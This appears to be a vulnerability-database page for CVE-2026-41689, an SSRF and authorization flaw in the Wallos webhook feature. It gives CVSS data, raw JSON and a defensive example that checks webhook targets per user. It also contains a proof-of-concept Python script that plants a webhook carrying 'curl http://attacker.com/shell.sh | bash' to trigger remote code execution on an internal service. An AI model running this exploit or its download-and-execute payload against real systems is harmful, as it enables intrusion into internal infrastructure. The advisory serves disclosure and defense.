Security Vulnerability Report
CVE-2026-41689 CVSS 6.0 MEDIUM

Published: 2026-05-07 15:16:09
Last Modified: 2026-05-07 16:16:21

Description

Wallos is an open-source, self-hostable personal subscription tracker. In versions 4.8.4 and prior, the webhook notification feature reuses an administrator-configured local-target allowlist for every logged-in user. Any normal user can fully control a webhook URL, headers, and body, then use Wallos to send server-side requests to allowlisted internal automation services. When such a target exposes deployment or execution APIs, this can further enable adjacent-service RCE, but that downstream result is conditional on the target service. At time of publication, there are no publicly available patches.
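To make the authorization gap concrete, here is an added example of a per-user webhook target check (written for this page, not Wallos project code): the admin-configured local-target allowlist stays, but it is only ever consulted for administrators, so a normal user cannot aim a webhook at loopback, RFC 1918, link-local or other non-public addresses at all. Function names, the `is_admin` flag and the constructed DNS table are assumptions.

```python
"""Added example (not Wallos code): per-user authorization of a webhook target.
The report's root cause is one admin-configured local-target allowlist applied
to every logged-in user (CWE-863), turning the webhook sender into an SSRF
primitive (CWE-918). This check treats any non-public destination as
admin-only and rejects non-http(s) schemes. Names/signatures are assumptions.
"""
import ipaddress
from urllib.parse import urlsplit

# Constructed stand-in for DNS so the example runs offline (real code:
# socket.getaddrinfo, and connect to the address you checked, or a
# rebinding hostname passes the check and then resolves elsewhere).
FAKE_DNS = {
    "internal-automation": "10.0.5.20",    # the PoC's allowlisted target
    "hooks.example.com": "93.184.216.34",  # an ordinary public endpoint
}

def resolve(host):
    """Return an ip_address for host (literal or table lookup), or None."""
    try:
        return ipaddress.ip_address(host)  # handles IPv4 and bracketed IPv6
    except ValueError:
        addr = FAKE_DNS.get(host)
        return ipaddress.ip_address(addr) if addr else None

def is_internal(ip):
    """Loopback, RFC 1918, link-local (169.254.x metadata), CGNAT, multicast
    and any other non-global space count as internal."""
    return ip.is_multicast or not ip.is_global

def authorize_webhook_target(url, is_admin, local_allowlist):
    """Return (allowed, reason). local_allowlist holds hostnames an admin
    approved as local targets; it is never consulted for non-admin users,
    which is exactly the authorization gap the report describes."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    ip = resolve(host)
    if ip is None:
        return False, "unresolvable host"
    if not is_internal(ip):
        return True, "public target"
    if not is_admin:
        return False, "local targets are admin-only"
    if host in local_allowlist:
        return True, "allowlisted local target (admin)"
    return False, "local target not in allowlist"
```

Run the same allowlisted internal URL through the check once as a normal user and once as an administrator to see the two outcomes diverge.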

CVSS Details

CVSS Score
6.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:L

Configurations (Affected Products)

Wallos <= 4.8.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target Wallos instance URL
target_host = "http://localhost:8080"
login_url = f"{target_host}/login"
webhook_url = f"{target_host}/api/webhooks"

# Attacker credentials
credentials = {
    "username": "low_priv_user",
    "password": "password123"
}

# Internal vulnerable service in the allowlist (e.g., Jenkins, GitLab)
internal_target = "http://internal-automation:8080/job/deploy/build"

# 1. Login to get session
session = requests.Session()
login_resp = session.post(login_url, data=credentials)

if login_resp.status_code == 200:
    # 2. Configure malicious webhook pointing to internal service
    malicious_webhook = {
        "name": "Backup Sync",
        "url": internal_target,
        "method": "POST",
        "headers": {
            "Content-Type": "application/json"
        },
        # Payload to trigger RCE on the internal service
        "body": "{\"parameter\": [{\"name\": \"SCRIPT\", \"value\": \"curl http://attacker.com/shell.sh | bash\"}]}"
    }

    # 3. Send the webhook configuration
    create_resp = session.post(webhook_url, json=malicious_webhook)
    if create_resp.status_code == 201:
        print("[+] Malicious webhook created successfully.")
        print("[+] Server will now send SSRF requests to internal automation service.")
    else:
        print("[-] Failed to create webhook.")
else:
    print("[-] Login failed.")

References

https://github.com/ellite/Wallos/security/advisories/GHSA-jx6w-832g-42wv

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-41689",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-07T15:16:09.387",
    "lastModified": "2026-05-07T16:16:20.623",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Wallos is an open-source, self-hostable personal subscription tracker. In versions 4.8.4 and prior, the webhook notification feature reuses an administrator-configured local-target allowlist for every logged-in user. Any normal user can fully control a webhook URL, headers, and body, then use Wallos to send server-side requests to allowlisted internal automation services. When such a target exposes deployment or execution APIs, this can further enable adjacent-service RCE, but that downstream result is conditional on the target service. At time of publication, there are no publicly available patches."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:L",
            "baseScore": 6.0,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 3.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-863"},
          {"lang": "en", "value": "CWE-918"}
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/ellite/Wallos/security/advisories/GHSA-jx6w-832g-42wv",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/ellite/Wallos/security/advisories/GHSA-jx6w-832g-42wv",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}